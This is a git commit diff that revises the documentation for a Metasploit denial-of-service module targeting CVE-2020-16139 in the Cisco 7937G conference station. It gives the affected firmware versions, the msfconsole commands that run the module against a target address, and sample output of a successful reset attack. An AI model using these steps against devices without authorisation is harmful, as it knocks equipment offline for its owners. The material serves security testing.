Update CVE-2020-16139.md

This commit is contained in:
debifrank 2020-08-14 12:15:53 -04:00 committed by GitHub
parent b4689dfa2d
commit 0e0bdc4f98
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 5 deletions

View File

@ -1,7 +1,7 @@
## Vulnerable Application
[Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
This module has been tested successfully against SCCP-1-4-5-5 and SCCP-1-4-5-7.
This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
### Description
@ -12,17 +12,22 @@ This module exploits a bug in how the conference station handles executing a pin
1. Obtain a Cisco 7937G Conference Station.
2. Enable Web Access on the device (default configuration).
3. Start msfconsole
4. Do: `use auxiliary/dos/cisco/CVE-2020-16139`
5. Do: `set RHOST 192.168.1.10`
4. Do: `use auxiliary/dos/cisco/cve_2020_16139`
5. Do: `set rhost 192.168.1.10`
6. Do: `run`
7. The conference station should become nonresponsive and then power cycle itself.
## Scenarios
### Cisco 7937G SCCP-1-4-5-7
### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
```
msf5 > use auxiliary/dos/cisco/cve_2020_16139
msf5 auxiliary(dos/cisco/cve_2020_16139) > set rhost 192.168.110.209
rhost => 192.168.110.209
msf5 auxiliary(dos/cisco/cve_2020_16139) > run
[*] Starting server...
[*] 192.168.110.209 - Sending DoS packets. Stand by.
[*] 192.168.110.209 - Sending DoS Packets. Stand by.
[*] 192.168.110.209 - DoS reset attack completed!
[*] Auxiliary module execution completed
```